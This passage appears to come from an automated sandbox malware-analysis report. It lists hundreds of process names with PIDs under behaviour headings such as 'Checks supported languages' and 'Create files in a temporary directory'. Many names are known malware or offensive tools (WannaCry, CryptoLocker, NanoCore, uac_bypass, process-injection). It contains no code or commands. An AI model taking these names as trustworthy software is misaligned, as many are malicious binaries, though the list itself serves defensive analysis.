      • Client-built.exe (PID: 15792)
      • ksv.exe (PID: 15800)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • Axam.exe (PID: 14780)
      • Pinaview.tmp (PID: 15548)
      • 1.exe (PID: 16212)
      • Installer_%E6%99%BA%E8%83%BD%E7%BF%BB%E8%AF%91%E5%AE%98_r1.7.9.exe (PID: 16268)
      • 2.exe (PID: 16308)
      • GMSSetupX86.exe (PID: 14956)
      • is-TSIJD.tmp (PID: 6092)
      • NP6lceA4ayWl.exe (PID: 16292)
      • is-LLDTH.tmp (PID: 15832)
      • BootstrapperNew.exe (PID: 13084)
      • BootstrapperNew.exe (PID: 14300)
      • cqsj.exe (PID: 16152)
      • WxWorkMultiOpen.exe (PID: 14588)
      • hAvav2N7QWPr.exe (PID: 16164)
      • msedge.exe (PID: 16628)
      • curl.exe (PID: 16704)
      • VC_redist.x64.exe (PID: 16856)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • AddMeFast%20Bot.exe (PID: 16976)
      • g64.exe (PID: 17036)
      • 32.exe (PID: 16848)
      • g64.exe (PID: 17160)
      • namu864.exe (PID: 16600)
      • x64-setup.exe (PID: 17396)
      • bmw_v1.7.exe (PID: 16888)
      • g64.exe (PID: 17328)
      • Phantom.exe (PID: 12580)
      • ksv.exe (PID: 16932)
      • mvc3.exe (PID: 17696)
      • DebugView%2b%2b.exe (PID: 17728)
      • doitallmain.exe (PID: 12104)
      • ui.exe (PID: 17736)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • cfxre.exe (PID: 13372)
      • Isass.exe (PID: 13720)
      • services.exe (PID: 17676)
      • Axam.exe (PID: 17348)
      • pst.exe (PID: 17612)
      • nircmd.exe (PID: 17424)
      • 123123.exe (PID: 17928)
      • q8348.exe (PID: 18124)
      • conhost.exe (PID: 18116)
      • mely.exe (PID: 18172)
      • fo-wsftp605.exe (PID: 17704)
      • namuvpnx2.exe (PID: 17684)
      • namu832.exe (PID: 17836)
      • lol11.exe (PID: 17596)
      • NAMUVPN7.exe (PID: 17772)
      • WindowsUpdate.exe (PID: 18236)
      • NAMUVPN32.exe (PID: 18180)
      • Ventrilo.exe (PID: 14120)
      • 1210.exe (PID: 17192)
      • bsg.exe (PID: 17228)
      • lol1.exe (PID: 17660)
      • tlp.exe (PID: 15048)
      • ClassTicket.exe (PID: 18140)
      • brbotnet.exe (PID: 17668)
      • AutoIt3.exe (PID: 17604)
      • giftorder.exe (PID: 18132)
      • XClient.exe (PID: 19376)
      • pkexU0YtxaR3.exe (PID: 14032)
      • Cloudy.exe (PID: 19428)
      • Cloudy.exe (PID: 19384)
      • 4J8576A0E8V3.exe (PID: 19024)
      • Server.exe (PID: 18108)
      • ShellHost.exe (PID: 2736)
      • riende.exe (PID: 18220)
      • steamcmd.exe (PID: 17580)
      • 4J8576A0E8V3.exe (PID: 18988)
      • offlinepackv4.exe (PID: 17852)
      • lol.exe (PID: 17576)
      • namuvpnxp.exe (PID: 19348)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • downloader.exe (PID: 18264)
      • 52.exe (PID: 19400)
      • randll32.exe (PID: 18904)
      • ZJQPPAJN.exe (PID: 19452)
      • BruterV3.1.exe (PID: 19640)
      • imgs.exe (PID: 19696)
      • Konsol.exe (PID: 10344)
      • yx_dts.exe (PID: 19084)
      • Install.exe (PID: 19628)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • mvc3.exe (PID: 7572)
      • Isass.exe (PID: 18436)
      • putty.exe (PID: 19520)
      • AppLaunch.exe (PID: 20180)
      • CHROMI~2.EXE (PID: 20216)
      • bnoaprihjatuasss.exe (PID: 20076)
      • zx.exe (PID: 16236)
      • NanoCore_Portable.exe (PID: 12160)
      • Round_Setup.exe (PID: 11388)
      • snd16061.exe (PID: 11732)
      • Fast%20Download.exe (PID: 21056)
      • IMG001.exe (PID: 21232)
      • 21.exe (PID: 9176)
      • CritScript.exe (PID: 14976)
      • assignment.exe (PID: 21224)
      • FXServer.exe (PID: 17808)
      • gallery-dl.exe (PID: 21828)
      • darts-wled.exe (PID: 21632)
      • Steanings.exe (PID: 21700)
      • Pdf%20Reader.exe (PID: 13460)
      • DRIVEapplet.exe (PID: 21680)
      • Steanings.exe (PID: 21708)
      • darts-pixelit.exe (PID: 8264)
      • PowerRat.exe (PID: 12780)
      • pvp.exe (PID: 21856)
      • game.exe (PID: 10460)
      • msiexec.exe (PID: 2936)
      • q-AMD64-Windows.exe (PID: 22352)
      • PLD06B.tmp (PID: 5696)
      • 21.tmp (PID: 20580)
      • 444.exe (PID: 21096)
      • prueba.exe (PID: 22456)
      • %E8%87%AA%E5%8A%A8%E6%9B%B4%E6%96%B0%E8%BE%85%E5%8A%A9%E7%A8%8B%E5%BA%8F.exe (PID: 22700)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • Axam.exe (PID: 22656)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
      • Darwin.exe (PID: 22844)
      • cabal.exe (PID: 14524)
      • curl.exe (PID: 24340)
      • DowOnline.Installer.tmp (PID: 24524)
      • Vector-fixer-v1.4.2.exe (PID: 24108)
      • teleport-assist-windows.exe (PID: 24604)
      • %E6%83%85%E6%84%BF%E6%80%80%E6%97%A7.exe (PID: 8432)
      • LauncherLoader.exe (PID: 18792)
      • TianSys(XP%E4%B8%93%E7%94%A8).exe (PID: 16884)
      • bypass.exe (PID: 25216)
      • vc2005sp1redist_x86.exe (PID: 24976)
      • AvamarConsoleMultiple-windows-x86_64-7.2.1-32.exe (PID: 24692)
      • darts-gif.exe (PID: 8512)
      • !WannaDecryptor!.exe (PID: 6112)
      • curl.exe (PID: 23920)
      • self-injection.exe (PID: 25088)
      • X空间.exe (PID: 23068)
      • HaoZipLoader.exe (PID: 22608)
      • alphaTweaks.exe (PID: 10592)
      • srtware.exe (PID: 24920)
      • Setup.exe (PID: 23792)
      • cqsj.exe (PID: 7288)
      • cssgo.exe (PID: 26244)
      • 7zG.exe (PID: 26004)
      • taskmoder.exe (PID: 26396)
      • dxwsetup.exe (PID: 26160)
      • Axam.exe (PID: 4116)
      • steamcmd.exe (PID: 25744)
      • Update.exe (PID: 26540)
      • black.exe (PID: 26308)
      • nwinfo.exe (PID: 16460)
      • nwinfo.exe (PID: 25852)
      • nwinfo.exe (PID: 20920)
      • svchost.exe (PID: 27620)
      • Axam.exe (PID: 12604)
      • mport.exe (PID: 27176)
      • upm2008.exe (PID: 27136)
      • riende.exe (PID: 14552)
      • jeditor.exe (PID: 13772)
      • IcarusLite-v1.1.13-win.exe (PID: 24656)
      • PrivacyPolicy.tmp (PID: 19896)
      • calendar.exe (PID: 26716)
      • Axam.exe (PID: 21160)
      • Axam.exe (PID: 3100)
      • Agentnov.exe (PID: 17112)
      • System.exe (PID: 26804)
      • Lab01-02.exe (PID: 26632)
      • ljgksdtihd.exe (PID: 15704)
      • Axam.exe (PID: 27576)
      • AutoUpdate.exe (PID: 27056)
      • pfntjejghjsdkr.exe (PID: 17760)
      • curl.exe (PID: 22404)
      • QiMiaoSetup.4.0.1.7.tmp (PID: 22504)
      • popapoers.exe (PID: 27136)
      • autocad_v1.4.exe (PID: 8412)
      • Axam.exe (PID: 25856)
      • SharpHound.exe (PID: 15432)
      • Vikings.exe (PID: 21892)
      • bnkrigkawd.exe (PID: 26680)
      • ZubovLekciya.exe (PID: 28084)
      • Axam.exe (PID: 27264)
      • NdisInstaller3.2.32.1.exe (PID: 28004)
      • FLMgrTray.exe (PID: 28408)
      • Axam.exe (PID: 27336)
      • msiexec.exe (PID: 29068)
      • main1.exe (PID: 29372)
      • main1.exe (PID: 29364)
      • main1.exe (PID: 29356)
      • Axam.exe (PID: 21548)
      • Axam.exe (PID: 19872)
      • Axam.exe (PID: 28572)
      • Axam.exe (PID: 29260)
      • FLServer.exe (PID: 26364)
      • Axam.exe (PID: 2988)
      • Axam.exe (PID: 20708)
      • CagService.exe (PID: 25112)
      • dts.exe (PID: 29504)
      • dts.exe (PID: 14572)
      • Axam.exe (PID: 18852)
      • Stub.exe (PID: 21192)
      • steamerx.exe (PID: 28176)
      • cd4.exe (PID: 1652)
      • justpoc.exe (PID: 25592)
      • chrome_134.exe (PID: 12024)
      • msiexec.exe (PID: 6880)
      • Axam.exe (PID: 28848)
      • curl.exe (PID: 29980)
      • Axam.exe (PID: 21520)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 29900)
      • curl.exe (PID: 13184)
      • master.exe (PID: 2692)
      • 7z.exe (PID: 31276)
      • AppLaunch.exe (PID: 24876)
      • Gui.exe (PID: 26328)
      • Axam.exe (PID: 24420)
      • Axam.exe (PID: 29492)
      • Axam.exe (PID: 31500)
      • Axam.exe (PID: 31360)
      • msiexec.exe (PID: 14424)
      • Axam.exe (PID: 31336)
      • RDPWInst.exe (PID: 23476)
      • Axam.exe (PID: 31656)
      • xblkpfZ8Y4.exe (PID: 20608)
      • X空间.exe (PID: 33344)
      • Srfuhxm.exe (PID: 33276)
      • aspnet_compiler.exe (PID: 6688)
      • main.exe (PID: 29244)
      • 20lb5101.jnh.scr (PID: 22668)
      • rustdesk.exe (PID: 23012)
      • curl.exe (PID: 30708)
    • Checks supported languages

      • main.exe (PID: 8072)
      • main.exe (PID: 6884)
      • bot_x64.exe (PID: 508)
      • Silentum_Spoofer.exe (PID: 2332)
      • Silentum_Spoofer.exe (PID: 900)
      • CFXBypass.exe (PID: 7800)
      • he.exe (PID: 7196)
      • CFXBypass.exe (PID: 4136)
      • Silentum_Spoofer.exe (PID: 7504)
      • nk.exe (PID: 4480)
      • vnc.exe (PID: 672)
      • payload.exe (PID: 7096)
      • net_launcher.exe (PID: 5264)
      • Pjibf.exe (PID: 8340)
      • VIolet.exe (PID: 8480)
      • hey.exe (PID: 8448)
      • UniversalBrowser.exe (PID: 8592)
      • Qbix01.exe (PID: 8860)
      • pro_payload.exe (PID: 8896)
      • v38438.exe (PID: 8468)
      • tXmCLyGO.exe (PID: 8996)
      • n743.exe (PID: 8800)
      • pardufrigi_installer_1.0.p1.exe (PID: 8556)
      • winvnc.exe (PID: 9988)
      • Axam.a.exe (PID: 10244)
      • Bexitor%20Installer.exe (PID: 10232)
      • ClipAid-Pro.exe (PID: 10180)
      • Loader.exe (PID: 10276)
      • Client.exe (PID: 10284)
      • Bugsoft.exe (PID: 10540)
      • TempSpoofer.exe (PID: 10724)
      • HorionInjector.exe (PID: 10732)
      • Prolin.exe (PID: 10772)
      • beacon.exe (PID: 10704)
      • Anap.a.exe (PID: 10716)
      • 2.exe (PID: 10932)
      • Amus.exe (PID: 10812)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • cummersMG.exe (PID: 11132)
      • pardufrigi_installer_1.0.p1.tmp (PID: 11184)
      • rickroll.exe (PID: 10848)
      • yc.exe (PID: 11436)
      • win.exe (PID: 8784)
      • dajoke2.exe (PID: 10920)
      • WxWorkMultiOpen.exe (PID: 10440)
      • WxWorkMultiOpen.exe (PID: 10156)
      • LOIC.exe (PID: 12328)
      • RuntimeBroker.exe (PID: 10116)
      • LOIC.exe (PID: 12320)
      • build1.exe (PID: 12548)
      • pieletJF_vm.exe (PID: 12568)
      • EDMSLauncherSetup.exe (PID: 12576)
      • 01.exe (PID: 12484)
      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
      • pe2shc.exe (PID: 11592)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • keepon.exe (PID: 12468)
      • 3yjehc7m.exe (PID: 12404)
      • WannaCry.exe (PID: 14000)
      • CryptoWall.exe (PID: 12296)
      • rod_en_1.exe (PID: 14016)
      • x834.exe (PID: 14060)
      • 37cqsj.exe (PID: 14052)
      • build.exe (PID: 14080)
      • rxd_en_1.exe (PID: 14068)
      • PDFConverter_P2W154-zx-666.exe (PID: 14088)
      • test.exe (PID: 14096)
      • 1.exe (PID: 14192)
      • L7XH7UR9695U.exe (PID: 14104)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • 1.exe (PID: 14200)
      • CryptoLocker.exe (PID: 12936)
      • Loader.exe (PID: 14328)
      • pieletJF.exe (PID: 11500)
      • G7_Update.exe (PID: 14380)
      • pk.exe (PID: 13368)
      • rmd_en_1.exe (PID: 14112)
      • Axam.exe (PID: 14780)
      • better.exe (PID: 14008)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • Pinaview.exe (PID: 14984)
      • WxWorkMultiOpen.exe (PID: 14240)
      • tomcat8.exe (PID: 14024)
      • RMO_SE~2.EXE (PID: 15232)
      • EdmsLauncher.exe (PID: 15280)
      • REXCEL~1.EXE (PID: 15288)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • WxWorkMultiOpen.exe (PID: 14416)
      • chcp.com (PID: 15588)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 15100)
      • Pulsar-Client.exe (PID: 15776)
      • Client-built.exe (PID: 15792)
      • v4343.exe (PID: 15812)
      • ksv.exe (PID: 15800)
      • is-LLDTH.tmp (PID: 15832)
      • s287.exe (PID: 16184)
      • setup.exe (PID: 15320)
      • GMSSetupX86.exe (PID: 14956)
      • Pinaview.tmp (PID: 15548)
      • cqsj.exe (PID: 16152)
      • Installer_%E6%99%BA%E8%83%BD%E7%BF%BB%E8%AF%91%E5%AE%98_r1.7.9.exe (PID: 16268)
      • 2.exe (PID: 16308)
      • 1.exe (PID: 16212)
      • NP6lceA4ayWl.exe (PID: 16292)
      • is-TSIJD.tmp (PID: 6092)
      • Isass.exe (PID: 13720)
      • BootstrapperNew.exe (PID: 14300)
      • BootstrapperNew.exe (PID: 13084)
      • hAvav2N7QWPr.exe (PID: 16164)
      • WxWorkMultiOpen.exe (PID: 14588)
      • msedge.exe (PID: 16628)
      • setup.exe (PID: 16688)
      • curl.exe (PID: 16704)
      • VC_redist.x64.exe (PID: 16856)
      • bmw_v1.7.exe (PID: 16888)
      • ksv.exe (PID: 16932)
      • AddMeFast%20Bot.exe (PID: 16976)
      • g64.exe (PID: 17036)
      • 32.exe (PID: 16848)
      • g64.exe (PID: 17160)
      • namu864.exe (PID: 16600)
      • g64.exe (PID: 17328)
      • Axam.exe (PID: 17348)
      • cfxre.exe (PID: 13372)
      • x64-setup.exe (PID: 17396)
      • Windows.x64.silent.CPU.exe (PID: 11696)
      • bsg.exe (PID: 17228)
      • 1210.exe (PID: 17192)
      • Phantom.exe (PID: 12580)
      • doitallmain.exe (PID: 12104)
      • nircmd.exe (PID: 17424)
      • pst.exe (PID: 17612)
      • AutoIt3.exe (PID: 17604)
      • lol1.exe (PID: 17660)
      • namuvpnx2.exe (PID: 17684)
      • mvc3.exe (PID: 17696)
      • fo-wsftp605.exe (PID: 17704)
      • DebugView%2b%2b.exe (PID: 17728)
      • ui.exe (PID: 17736)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • NAMUVPN7.exe (PID: 17772)
      • lol11.exe (PID: 17596)
      • services.exe (PID: 17676)
      • namu832.exe (PID: 17836)
      • 123123.exe (PID: 17928)
      • q8348.exe (PID: 18124)
      • conhost.exe (PID: 18116)
      • mely.exe (PID: 18172)
      • ClassTicket.exe (PID: 18140)
      • NAMUVPN32.exe (PID: 18180)
      • Ventrilo.exe (PID: 14120)
      • giftorder.exe (PID: 18132)
      • tlp.exe (PID: 15048)
      • WindowsUpdate.exe (PID: 18236)
      • riende.exe (PID: 18220)
      • brbotnet.exe (PID: 17668)
      • fastping_silent_v4.exe (PID: 17780)
      • offlinepackv4.exe (PID: 17852)
      • lol.exe (PID: 17576)
      • Server.exe (PID: 18108)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • 4J8576A0E8V3.exe (PID: 19024)
      • 4J8576A0E8V3.exe (PID: 18988)
      • Isass.exe (PID: 18436)
      • steamcmd.exe (PID: 17580)
      • pkexU0YtxaR3.exe (PID: 14032)
      • XClient.exe (PID: 19376)
      • sm.exe (PID: 19328)
      • namuvpnxp.exe (PID: 19348)
      • Cloudy.exe (PID: 19428)
      • Cloudy.exe (PID: 19384)
      • 52.exe (PID: 19400)
      • 1488.exe (PID: 19436)
      • ZJQPPAJN.exe (PID: 19452)
      • yx_dts.exe (PID: 19084)
      • ShellHost.exe (PID: 2736)
      • downloader.exe (PID: 18264)
      • mvc3.exe (PID: 7572)
      • randll32.exe (PID: 18904)
      • chrome_134.exe (PID: 12024)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • Round_Setup.exe (PID: 11388)
      • 5252.exe (PID: 19368)
      • hbvTmbP46IIEeHP1.exe (PID: 12260)
      • PLD06B.tmp (PID: 5696)
      • c1i.exe (PID: 19228)
      • RDPW_Installer.exe (PID: 10824)
      • putty.exe (PID: 19520)
      • Konsol.exe (PID: 10344)
      • Install.exe (PID: 19628)
      • BruterV3.1.exe (PID: 19640)
      • imgs.exe (PID: 19696)
      • ChilledWindows.GUI.exe (PID: 19688)
      • bnoaprihjatuasss.exe (PID: 20076)
      • agent.exe (PID: 16344)
      • AppLaunch.exe (PID: 20180)
      • csc.exe (PID: 19788)
      • ChromeUpdate.exe (PID: 20368)
      • cvf.exe (PID: 18624)
      • Ytkjmt.exe (PID: 20228)
      • ntladlklthawd.exe (PID: 19736)
      • CHROMI~2.EXE (PID: 20216)
      • chcp.com (PID: 19540)
      • NanoCore_Portable.exe (PID: 12160)
      • zx.exe (PID: 16236)
      • snd16061.exe (PID: 11732)
      • cvtres.exe (PID: 12620)
      • bot.exe (PID: 20412)
      • Fast%20Download.exe (PID: 21056)
      • Setup.exe (PID: 20872)
      • 444.exe (PID: 21096)
      • cvf.exe (PID: 20776)
      • IMG001.exe (PID: 21232)
      • access.exe (PID: 21436)
      • zx.exe (PID: 20324)
      • CritScript.exe (PID: 14976)
      • assignment.exe (PID: 21224)
      • FXServer.exe (PID: 17808)
      • Pdf%20Reader.exe (PID: 13460)
      • 21.exe (PID: 9176)
      • disbalancer-go-client-windows-386.exe (PID: 20948)
      • EmmetPROD.exe (PID: 21048)
      • Steanings.exe (PID: 21700)
      • q-AMD64-Windows.exe (PID: 10208)
      • Steanings.exe (PID: 21708)
      • darts-wled.exe (PID: 21632)
      • gallery-dl.exe (PID: 21828)
      • darts-pixelit.exe (PID: 8264)
      • DRIVEapplet.exe (PID: 21680)
      • svhost.exe (PID: 21848)
      • taskhostw.exe (PID: 13948)
      • UrbanVPN.exe (PID: 19704)
      • game.exe (PID: 10460)
      • prueba.exe (PID: 22456)
      • 21.tmp (PID: 20580)
      • v1d.exe (PID: 13364)
      • msiexec.exe (PID: 2936)
      • pvp.exe (PID: 21856)
      • gallery-dl.exe (PID: 11192)
      • 4.exe (PID: 12296)
      • PowerRat.exe (PID: 12780)
      • q-AMD64-Windows.exe (PID: 22352)
      • csc.exe (PID: 10520)
      • %E8%87%AA%E5%8A%A8%E6%9B%B4%E6%96%B0%E8%BE%85%E5%8A%A9%E7%A8%8B%E5%BA%8F.exe (PID: 22700)
      • darts-pixelit.exe (PID: 23252)
      • darts-wled.exe (PID: 23096)
      • Darwin.exe (PID: 22844)
      • Axam.exe (PID: 22656)
      • RDPWInst.exe (PID: 22616)
      • cvtres.exe (PID: 13028)
      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • cabal.exe (PID: 14524)
      • DowOnline.Installer.exe (PID: 11080)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
      • haozip.100021.exe (PID: 12740)
      • Setup.exe (PID: 23792)
      • Vector-fixer-v1.4.2.exe (PID: 24108)
      • 1488.exe (PID: 21740)
      • curl.exe (PID: 24340)
      • Win_Driver_SSL_support_v43.22.209.44.exe (PID: 17296)
      • DowOnline.Installer.tmp (PID: 24524)
      • Axam.exe (PID: 4116)
      • TianSys(XP%E4%B8%93%E7%94%A8).exe (PID: 16884)
      • cr.exe (PID: 23732)
      • teleport-assist-windows.exe (PID: 24604)
      • LauncherLoader.exe (PID: 18792)
      • csc.exe (PID: 24540)
      • %E6%83%85%E6%84%BF%E6%80%80%E6%97%A7.exe (PID: 8432)
      • Serials_Checker.exe (PID: 12488)
      • !WannaDecryptor!.exe (PID: 6112)
      • vc2005sp1redist_x86.exe (PID: 24976)
      • uac_bypass.exe (PID: 25036)
      • curl.exe (PID: 23920)
      • IcarusLite-v1.1.13-win.exe (PID: 24656)
      • AvamarConsoleMultiple-windows-x86_64-7.2.1-32.exe (PID: 24692)
      • bypass.exe (PID: 25216)
      • master.exe (PID: 2692)
      • darts-gif.exe (PID: 8512)
      • server.exe (PID: 20324)
      • self-injection.exe (PID: 25088)
      • cvtres.exe (PID: 25460)
      • alphaTweaks.exe (PID: 10592)
      • HaoZipLoader.exe (PID: 22608)
      • cqsj.exe (PID: 7288)
      • Axam.exe (PID: 3100)
      • hack.exe (PID: 21960)
      • srtware.exe (PID: 24920)
      • dxwebsetup.exe (PID: 18212)
      • X空间.exe (PID: 23068)
      • Axam.exe (PID: 12604)
      • steamcmd.exe (PID: 25744)
      • 7zG.exe (PID: 26004)
      • kdmapper_Release.exe (PID: 9296)
      • dxwsetup.exe (PID: 26160)
      • cssgo.exe (PID: 26244)
      • taskmoder.exe (PID: 26396)
      • Update.exe (PID: 26540)
      • Mova.exe (PID: 26532)
      • process-injection.exe (PID: 20640)
      • winsetaccess64.exe (PID: 26756)
      • nwinfo.exe (PID: 20920)
      • standalone_payload.exe (PID: 10836)
      • AutoUpdate.exe (PID: 27056)
      • nwinfo.exe (PID: 25852)
      • IATInfect2008_64.exe (PID: 27184)
      • nwinfo.exe (PID: 16460)
      • Axam.exe (PID: 21160)
      • svchost.exe (PID: 27620)
      • Decred.exe (PID: 15764)
      • mode.com (PID: 27536)
      • riende.exe (PID: 14552)
      • PrivacyPolicy.exe (PID: 19912)
      • Axam.exe (PID: 27576)
      • writedat.exe (PID: 26628)
      • javaw.exe (PID: 27480)
      • mport.exe (PID: 27176)
      • upm2008.exe (PID: 27136)
      • Axam.exe (PID: 27264)
      • PrivacyPolicy.tmp (PID: 19896)
      • Axam.exe (PID: 25856)
      • Axam.exe (PID: 27336)
      • calendar.exe (PID: 26716)
      • jeditor.exe (PID: 13772)
      • Agentnov.exe (PID: 17112)
      • connector1.exe (PID: 16620)
      • donut.exe (PID: 27356)
      • System.exe (PID: 26804)
      • QiMiaoSetup.4.0.1.7.exe (PID: 16168)
      • ljgksdtihd.exe (PID: 15704)
      • csc.exe (PID: 27432)
      • Lab01-02.exe (PID: 26632)
      • donut.exe (PID: 27472)
      • popapoers.exe (PID: 27136)
      • autocad_v1.4.exe (PID: 8412)
      • QiMiaoSetup.4.0.1.7.tmp (PID: 22504)
      • pfntjejghjsdkr.exe (PID: 17760)
      • curl.exe (PID: 22404)
      • bnkrigkawd.exe (PID: 26680)
      • rustdesk-1.2.3-2-x86_64.exe (PID: 15740)
      • Vikings.exe (PID: 21892)
      • cvtres.exe (PID: 11684)
      • SharpHound.exe (PID: 15432)
      • ZubovLekciya.exe (PID: 28084)
      • NdisInstaller3.2.32.1.exe (PID: 28004)
      • Axam.exe (PID: 2988)
      • FLMgrTray.exe (PID: 28408)
      • System.exe (PID: 28384)
      • Axam.exe (PID: 19872)
      • msiexec.exe (PID: 29068)
      • main1.exe (PID: 29364)
      • Axam.exe (PID: 18852)
      • main1.exe (PID: 29356)
      • Axam.exe (PID: 28848)
      • mode.com (PID: 28676)
      • Axam.exe (PID: 20708)
      • Axam.exe (PID: 29260)
      • main1.exe (PID: 29372)
      • Axam.exe (PID: 27464)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 21520)
      • FLServer.exe (PID: 26364)
      • Axam.exe (PID: 29492)
      • dts.exe (PID: 14572)
      • fscan32.exe (PID: 29520)
      • Axam.exe (PID: 29900)
      • CagService.exe (PID: 25112)
      • dts.exe (PID: 29504)
      • main.exe (PID: 29244)
      • steamerx.exe (PID: 28176)
      • Stub.exe (PID: 21192)
      • main1.exe (PID: 23532)
      • black.exe (PID: 26308)
      • opyhjdase.exe (PID: 30172)
      • curl.exe (PID: 29980)
      • RedX_Setup.exe (PID: 26440)
      • cd4.exe (PID: 1652)
      • justpoc.exe (PID: 25592)
      • msiexec.exe (PID: 6880)
      • main1.exe (PID: 25564)
      • Axam.exe (PID: 31656)
      • Gui.exe (PID: 26328)
      • chromelevator.exe (PID: 10808)
      • mode.com (PID: 31864)
      • curl.exe (PID: 13184)
      • xblkpfZ8Y4.exe (PID: 20608)
      • 7z.exe (PID: 31276)
      • Axam.exe (PID: 31336)
      • Axam.exe (PID: 31500)
      • AppLaunch.exe (PID: 24876)
      • RDPWInst.exe (PID: 23476)
      • sound.exe (PID: 5212)
      • certinst.exe (PID: 28708)
      • Gxtuum.exe (PID: 33256)
      • msiexec.exe (PID: 14424)
      • Stub.exe (PID: 31024)
      • Axam.exe (PID: 33764)
      • Axam.exe (PID: 29320)
      • X空间.exe (PID: 33344)
      • Srfuhxm.exe (PID: 33276)
      • chcp.com (PID: 23400)
      • rustdesk.exe (PID: 23012)
      • aspnet_compiler.exe (PID: 6688)
      • Axam.exe (PID: 24256)
      • IniEditor.exe (PID: 18832)
      • Axam.exe (PID: 30332)
      • curl.exe (PID: 30708)
      • msiexec.exe (PID: 31496)
      • cd4.exe (PID: 25380)
      • NanoCore.exe (PID: 21264)
      • curl.exe (PID: 30236)
    • Create files in a temporary directory

      • main.exe (PID: 6884)
      • bot_x64.exe (PID: 508)
      • Silentum_Spoofer.exe (PID: 900)
      • Silentum_Spoofer.exe (PID: 2332)
      • CFXBypass.exe (PID: 4136)
      • Silentum_Spoofer.exe (PID: 7504)
      • CFXBypass.exe (PID: 7800)
      • Qbix01.exe (PID: 8860)
      • pardufrigi_installer_1.0.p1.exe (PID: 8556)
      • Axam.a.exe (PID: 10244)
      • Bexitor%20Installer.exe (PID: 10232)
      • Amus.exe (PID: 10812)
      • Bugsoft.exe (PID: 10540)
      • Prolin.exe (PID: 10772)
      • pardufrigi_installer_1.0.p1.tmp (PID: 11184)
      • TempSpoofer.exe (PID: 10724)
      • EDMSLauncherSetup.exe (PID: 12576)
      • 3yjehc7m.exe (PID: 12404)
      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • %E7%BD%91%E6%98%93%E4%BA%91%E9%9F%B3%E4%B9%90.exe (PID: 12516)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • 37cqsj.exe (PID: 14052)
      • rmd_en_1.exe (PID: 14112)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • Pinaview.exe (PID: 14984)
      • Axam.exe (PID: 14780)
      • RMO_SE~2.EXE (PID: 15232)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 14388)
      • ksv.exe (PID: 15800)
      • s287.exe (PID: 16184)
      • setup.exe (PID: 15320)
      • Pinaview.tmp (PID: 15548)
      • 2.exe (PID: 16308)
      • NP6lceA4ayWl.exe (PID: 16292)
      • is-TSIJD.tmp (PID: 6092)
      • is-LLDTH.tmp (PID: 15832)
      • msiexec.exe (PID: 16584)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • 32.exe (PID: 16848)
      • Axam.exe (PID: 17348)
      • cfxre.exe (PID: 13372)
      • doitallmain.exe (PID: 12104)
      • mvc3.exe (PID: 17696)
      • fo-wsftp605.exe (PID: 17704)
      • ui.exe (PID: 17736)
      • Isass.exe (PID: 13720)
      • lol11.exe (PID: 17596)
      • pst.exe (PID: 17612)
      • NAMUVPN32.exe (PID: 18180)
      • lol1.exe (PID: 17660)
      • fastping_silent_v4.exe (PID: 17780)
      • offlinepackv4.exe (PID: 17852)
      • sm.exe (PID: 19328)
      • downloader.exe (PID: 18264)
      • ZJQPPAJN.exe (PID: 19452)
      • yx_dts.exe (PID: 19084)
      • 5252.exe (PID: 19368)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • RDPW_Installer.exe (PID: 10824)
      • ChilledWindows.GUI.exe (PID: 19688)
      • msiexec.exe (PID: 19472)
      • csc.exe (PID: 19788)
      • msiexec.exe (PID: 20388)
      • imgs.exe (PID: 19696)
      • cvtres.exe (PID: 12620)
      • zx.exe (PID: 16236)
      • NanoCore_Portable.exe (PID: 12160)
      • ksv.exe (PID: 16932)
      • CritScript.exe (PID: 14976)
      • 21.exe (PID: 9176)
      • FXServer.exe (PID: 17808)
      • q-AMD64-Windows.exe (PID: 10208)
      • gallery-dl.exe (PID: 21828)
      • darts-wled.exe (PID: 21632)
      • darts-pixelit.exe (PID: 8264)
      • 4.exe (PID: 12296)
      • csc.exe (PID: 10520)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • game.exe (PID: 10460)
